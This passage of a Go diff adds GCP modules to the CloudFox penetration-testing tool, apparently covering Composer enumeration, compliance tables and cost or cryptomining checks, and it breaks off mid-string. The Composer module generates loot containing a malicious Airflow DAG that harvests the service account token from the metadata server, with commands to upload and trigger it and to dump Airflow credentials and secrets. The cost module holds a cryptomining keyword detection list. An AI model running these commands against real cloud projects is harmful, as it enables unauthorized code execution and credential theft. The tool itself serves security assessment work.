nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err 
!= nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *ComplianceDashboardModule) buildTablesForProject(projectID string) []internal.TableFile { + // Filter controls for this project + var projectControls []ComplianceControl + for _, c := range m.Controls { + if c.ProjectID == projectID || c.ProjectID == "" { + projectControls = append(projectControls, c) + } + } + + // Filter failures for this project + var projectFailures []ComplianceFailure + for _, f := range m.Failures { + if f.ProjectID == projectID { + projectFailures = append(projectFailures, f) + } + } + + // If no project-specific data, return empty + if len(projectControls) == 0 && len(projectFailures) == 0 { + return nil + } + + var tables []internal.TableFile + + // Controls table + if len(projectControls) > 0 { + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range projectControls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }) + } + + // Failures table + if len(projectFailures) > 0 { + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range projectFailures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + 
tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + return tables +} + +func (m *ComplianceDashboardModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := ComplianceDashboardOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go new file mode 100644 index 00000000..39bb7979 --- /dev/null +++ b/gcp/commands/composer.go @@ -0,0 +1,388 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPComposerCommand = &cobra.Command{ + Use: globals.GCP_COMPOSER_MODULE_NAME, + Aliases: []string{"airflow"}, + Short: "Enumerate Cloud Composer environments", + Long: `Enumerate Cloud Composer (managed Apache Airflow) environments. 
+ +Features: +- Lists all Composer environments across locations +- Shows Airflow web UI endpoints +- Identifies service account configuration +- Analyzes network exposure (private vs public) +- Detects overly permissive IP restrictions`, + Run: runGCPComposerCommand, +} + +type ComposerModule struct { + gcpinternal.BaseGCPModule + ProjectEnvironments map[string][]composerservice.EnvironmentInfo // projectID -> environments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis + mu sync.Mutex +} + +type ComposerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComposerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComposerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPComposerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_COMPOSER_MODULE_NAME) + if err != nil { + return + } + + module := &ComposerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEnvironments: make(map[string][]composerservice.EnvironmentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) + + allEnvironments := m.getAllEnvironments() + if len(allEnvironments) == 0 { + logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicEnvs := 0 + for _, env := range allEnvironments { + if env.State == "RUNNING" { + running++ + } + if !env.PrivateEnvironment { + publicEnvs++ + } + } + + 
logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", + len(allEnvironments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *ComposerModule) getAllEnvironments() []composerservice.EnvironmentInfo { + var all []composerservice.EnvironmentInfo + for _, envs := range m.ProjectEnvironments { + all = append(all, envs...) + } + return all +} + +func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) + } + + svc := composerservice.New() + environments, err := svc.ListEnvironments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_COMPOSER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Composer environments in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectEnvironments[projectID] = environments + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, env := range environments { + m.addToLoot(projectID, env) + } + m.mu.Unlock() +} + +func (m *ComposerModule) addToLoot(projectID string, env composerservice.EnvironmentInfo) { + lootFile := m.LootMap[projectID]["composer-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# COMPOSER ENVIRONMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + 
"# State: %s\n"+ + "# Service Account: %s\n"+ + "# Private: %s\n", + env.Name, env.ProjectID, env.Location, + env.State, env.ServiceAccount, + shared.BoolToYesNo(env.PrivateEnvironment), + ) + + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe environment: +gcloud composer environments describe %s --location=%s --project=%s + +# List DAGs: +gcloud composer environments run %s --location=%s --project=%s dags list + +# List Airflow connections (may contain credentials): +gcloud composer environments run %s --location=%s --project=%s connections list + +# List Airflow variables (may contain secrets): +gcloud composer environments run %s --location=%s --project=%s variables list + +# List Airflow pools: +gcloud composer environments run %s --location=%s --project=%s pools list + +# Show environment configuration: +gcloud composer environments describe %s --location=%s --project=%s --format=json | jq '.config' + +`, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // === DAG BUCKET COMMANDS === + if env.DagGcsPrefix != "" { + lootFile.Contents += fmt.Sprintf( + "# === DAG BUCKET COMMANDS ===\n\n"+ + "# List DAG files:\n"+ + "gsutil ls %s\n\n"+ + "# Download all DAGs for analysis:\n"+ + "gsutil -m cp -r %s /tmp/composer-dags-%s/\n\n"+ + "# Search DAGs for hardcoded credentials:\n"+ + "gsutil cat %s/*.py | grep -iE '(password|secret|token|key|credential)'\n\n", + env.DagGcsPrefix, + env.DagGcsPrefix, env.Name, + env.DagGcsPrefix, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // DAG upload for code execution (CRITICAL attack vector) + if env.DagGcsPrefix != "" { + lootFile.Contents += fmt.Sprintf( + "# Upload malicious DAG for code execution (runs as 
Composer SA: %s):\n"+ + "# Create a reverse shell DAG or credential harvester:\n"+ + "cat > /tmp/cloudfox_dag.py << 'DAGEOF'\n"+ + "from airflow import DAG\n"+ + "from airflow.operators.python import PythonOperator\n"+ + "from datetime import datetime\n"+ + "import subprocess, json\n"+ + "def exfil_metadata():\n"+ + " # Get SA token from metadata\n"+ + " result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + " print(json.loads(result.stdout))\n"+ + "dag = DAG('cloudfox_test', start_date=datetime(2024,1,1), schedule_interval=None)\n"+ + "task = PythonOperator(task_id='test', python_callable=exfil_metadata, dag=dag)\n"+ + "DAGEOF\n"+ + "gsutil cp /tmp/cloudfox_dag.py %s/cloudfox_dag.py\n\n"+ + "# Trigger the uploaded DAG:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags trigger cloudfox_test\n\n"+ + "# Check DAG run status:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list-runs -d cloudfox_test\n\n", + env.ServiceAccount, + env.DagGcsPrefix, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + } + + // Extract Airflow connection credentials + lootFile.Contents += fmt.Sprintf( + "# Dump Airflow connection credentials:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections list -- -o json\n\n"+ + "# Export specific connection details:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections get -- \n\n"+ + "# Dump all Airflow variables (may contain secrets):\n"+ + "gcloud composer environments run %s --location=%s --project=%s variables export -- /tmp/variables.json\n\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // Airflow Web UI + if env.AirflowURI != "" { + lootFile.Contents 
+= fmt.Sprintf( + "# Airflow Web UI (access via browser with authenticated session):\n"+ + "# %s\n\n", + env.AirflowURI, + ) + } + + lootFile.Contents += "\n" +} + +func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComposerModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Service Account", + "SA Attack Paths", + "Private", + "Private Endpoint", + "Airflow URI", + "DAG Bucket", + "Image Version", + } +} + +func (m *ComposerModule) environmentsToTableBody(environments []composerservice.EnvironmentInfo) [][]string { + var body [][]string + for _, env := range environments { + sa := env.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + airflowURI := env.AirflowURI + if airflowURI == "" { + airflowURI = "-" + } + + dagBucket := env.DagGcsPrefix + if dagBucket == "" { + dagBucket = "-" + } + + imageVersion := env.ImageVersion + if imageVersion == "" { + imageVersion = "-" + } + + body = append(body, []string{ + m.GetProjectName(env.ProjectID), + env.ProjectID, + env.Name, + env.Location, + env.State, + sa, + attackPaths, + shared.BoolToYesNo(env.PrivateEnvironment), + shared.BoolToYesNo(env.EnablePrivateEndpoint), + airflowURI, + dagBucket, + imageVersion, + }) + } + return body +} + +func (m *ComposerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + 
ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, environments := range m.ProjectEnvironments { + body := m.environmentsToTableBody(environments) + tableFiles := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ComposerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} + +func (m *ComposerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEnvironments := m.getAllEnvironments() + body := m.environmentsToTableBody(allEnvironments) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} + output := ComposerOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), 
globals.GCP_COMPOSER_MODULE_NAME) + } +} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go new file mode 100644 index 00000000..ee718aec --- /dev/null +++ b/gcp/commands/costsecurity.go @@ -0,0 +1,1171 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" + "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" + +var GCPCostSecurityCommand = &cobra.Command{ + Use: GCP_COSTSECURITY_MODULE_NAME, + Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Hidden: true, + Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", + Long: `Analyze resources for cost-related security issues and waste. 
+ +Features: +- Detects potential cryptomining indicators (high CPU instances, GPUs) +- Identifies orphaned resources (unattached disks, unused IPs) +- Finds expensive idle resources +- Analyzes resource utilization patterns +- Identifies resources without cost allocation labels +- Detects unusual resource creation patterns + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/storage.admin +- roles/cloudsql.viewer`, + Run: runGCPCostSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type CostAnomaly struct { + Name string + ProjectID string + ResourceType string + AnomalyType string // cryptomining, orphaned, idle, unlabeled, unusual-creation + Severity string + Details string + EstCostMonth float64 + CreatedTime string + Location string + Remediation string +} + +type OrphanedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + Status string + CreatedTime string + EstCostMonth float64 + Reason string +} + +type ExpensiveResource struct { + Name string + ProjectID string + ResourceType string + Location string + MachineType string + VCPUs int64 + MemoryGB float64 + GPUs int + Status string + CreatedTime string + Labels map[string]string + EstCostMonth float64 +} + +type CryptominingIndicator struct { + Name string + ProjectID string + ResourceType string + Location string + Indicator string + Confidence string // HIGH, MEDIUM, LOW + Details string + CreatedTime string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CostSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + CostAnomalies []CostAnomaly + Orphaned []OrphanedResource + Expensive []ExpensiveResource + Cryptomining []CryptominingIndicator + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalEstCost float64 + orphanedEstCost float64 + 
cryptoIndicators int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CostSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CostSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CostSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCostSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COSTSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &CostSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CostAnomalies: []CostAnomaly{}, + Orphaned: []OrphanedResource{}, + Expensive: []ExpensiveResource{}, + Cryptomining: []CryptominingIndicator{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CostSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing resources for cost anomalies and security issues...", GCP_COSTSECURITY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + return + } + + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Storage service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= 
globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, storageService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Check results + totalFindings := len(m.CostAnomalies) + len(m.Orphaned) + len(m.Cryptomining) + if totalFindings == 0 { + logger.InfoM("No cost anomalies or security issues found", GCP_COSTSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d cost anomaly(ies), %d orphaned resource(s), %d cryptomining indicator(s)", + len(m.CostAnomalies), len(m.Orphaned), len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + + if len(m.Cryptomining) > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d potential cryptomining indicator(s) detected!", len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + } + + if m.orphanedEstCost > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Estimated monthly cost of orphaned resources: $%.2f", m.orphanedEstCost), GCP_COSTSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CostSecurityModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, storageService *storage.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing costs for project: %s", projectID), GCP_COSTSECURITY_MODULE_NAME) + } + + // Analyze compute instances + m.analyzeComputeInstances(ctx, projectID, computeService, logger) + + // Find orphaned disks + m.findOrphanedDisks(ctx, projectID, computeService, logger) + + // Find orphaned IPs + m.findOrphanedIPs(ctx, projectID, computeService, logger) + 
+ // Analyze SQL instances + if sqlService != nil { + m.analyzeSQLInstances(ctx, projectID, sqlService, logger) + } + + // Analyze storage buckets + if storageService != nil { + m.analyzeStorageBuckets(ctx, projectID, storageService, logger) + } +} + +func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instanceList := range page.Items { + if instanceList.Instances == nil { + continue + } + for _, instance := range instanceList.Instances { + m.analyzeInstance(instance, projectID, m.extractZoneFromURL(zone), logger) + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate compute instances in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeInstance(instance *compute.Instance, projectID, zone string, logger internal.Logger) { + machineType := m.extractMachineTypeName(instance.MachineType) + vcpus, memGB := m.parseMachineType(machineType) + + // Count GPUs + gpuCount := 0 + for _, accel := range instance.GuestAccelerators { + gpuCount += int(accel.AcceleratorCount) + } + + // Check for cryptomining indicators + m.checkCryptominingIndicators(instance, projectID, zone, machineType, vcpus, memGB, gpuCount) + + // Check for expensive resources + estCost := m.estimateInstanceCost(machineType, vcpus, memGB, gpuCount) + if estCost > 500 { // Monthly threshold + expensive := ExpensiveResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + MachineType: machineType, + VCPUs: vcpus, + MemoryGB: memGB, + GPUs: gpuCount, + Status: instance.Status, + CreatedTime: instance.CreationTimestamp, + Labels: instance.Labels, + EstCostMonth: estCost, 
+ } + + m.mu.Lock() + m.Expensive = append(m.Expensive, expensive) + m.totalEstCost += estCost + m.mu.Unlock() + } + + // Check for unlabeled resources + if len(instance.Labels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Instance has no cost allocation labels", + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: fmt.Sprintf("gcloud compute instances add-labels %s --labels=cost-center=UNKNOWN,owner=UNKNOWN --zone=%s --project=%s", instance.Name, zone, projectID), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for unusual creation times (off-hours) + m.checkUnusualCreation(instance, projectID, zone, estCost) +} + +func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Instance, projectID, zone, machineType string, vcpus int64, memGB float64, gpuCount int) { + indicators := []CryptominingIndicator{} + + // Indicator 1: GPU instance + if gpuCount > 0 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "GPU_INSTANCE", + Confidence: "MEDIUM", + Details: fmt.Sprintf("Instance has %d GPU(s) attached", gpuCount), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance is authorized for GPU workloads", + } + indicators = append(indicators, indicator) + } + + // Indicator 2: High CPU count + if vcpus >= 32 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("Instance has %d vCPUs (high compute capacity)", vcpus), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance's CPU usage is legitimate", + } + indicators = 
append(indicators, indicator) + } + + // Indicator 3: Preemptible/Spot with high specs (common for mining) + if instance.Scheduling != nil && instance.Scheduling.Preemptible && (vcpus >= 8 || gpuCount > 0) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "PREEMPTIBLE_HIGH_SPEC", + Confidence: "MEDIUM", + Details: "Preemptible instance with high specs (common mining pattern)", + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this preemptible instance is used for legitimate batch processing", + } + indicators = append(indicators, indicator) + } + + // Indicator 4: Suspicious naming patterns + nameLower := strings.ToLower(instance.Name) + suspiciousPatterns := []string{"miner", "mining", "xmr", "monero", "btc", "ethereum", "eth", "crypto", "hash"} + for _, pattern := range suspiciousPatterns { + if strings.Contains(nameLower, pattern) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "SUSPICIOUS_NAME", + Confidence: "HIGH", + Details: fmt.Sprintf("Instance name contains suspicious pattern: %s", pattern), + CreatedTime: instance.CreationTimestamp, + Remediation: "Investigate this instance immediately for cryptomining", + } + indicators = append(indicators, indicator) + break + } + } + + // Indicator 5: N2D/C2 machine types (AMD EPYC - preferred for mining) + if strings.HasPrefix(machineType, "n2d-") || strings.HasPrefix(machineType, "c2-") { + if vcpus >= 16 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "AMD_HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("AMD EPYC instance with high CPU (%s)", machineType), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify legitimate use of AMD EPYC high-CPU instance", + } + 
indicators = append(indicators, indicator) + } + } + + // Add indicators to tracking + m.mu.Lock() + for _, ind := range indicators { + m.Cryptomining = append(m.Cryptomining, ind) + m.cryptoIndicators++ + + // Add to loot + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CRYPTOMINING INDICATOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s | Type: %s\n"+ + "# Investigate instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Stop instance if suspicious:\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n\n", + ind.Name, + ind.ProjectID, + ind.Location, ind.Indicator, + ind.Name, ind.Location, ind.ProjectID, + ind.Name, ind.Location, ind.ProjectID, + ) + } + m.mu.Unlock() +} + +func (m *CostSecurityModule) checkUnusualCreation(instance *compute.Instance, projectID, zone string, estCost float64) { + createdTime, err := time.Parse(time.RFC3339, instance.CreationTimestamp) + if err != nil { + return + } + + // Check if created during unusual hours (midnight to 5am local, or weekends) + hour := createdTime.Hour() + weekday := createdTime.Weekday() + + if (hour >= 0 && hour <= 5) || weekday == time.Saturday || weekday == time.Sunday { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unusual-creation", + Severity: "MEDIUM", + Details: fmt.Sprintf("Instance created at unusual time: %s", createdTime.Format("Mon 2006-01-02 15:04")), + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: "Verify this instance creation was authorized", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } +} + +func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID string, 
computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + // Check if disk is attached to any instance + if len(disk.Users) == 0 { + estCost := m.estimateDiskCost(disk.SizeGb, disk.Type) + + orphaned := OrphanedResource{ + Name: disk.Name, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(zone), + SizeGB: disk.SizeGb, + Status: disk.Status, + CreatedTime: disk.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Disk not attached to any instance", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + // Add cleanup command to loot + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORPHANED DISK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Size: %dGB | Est. 
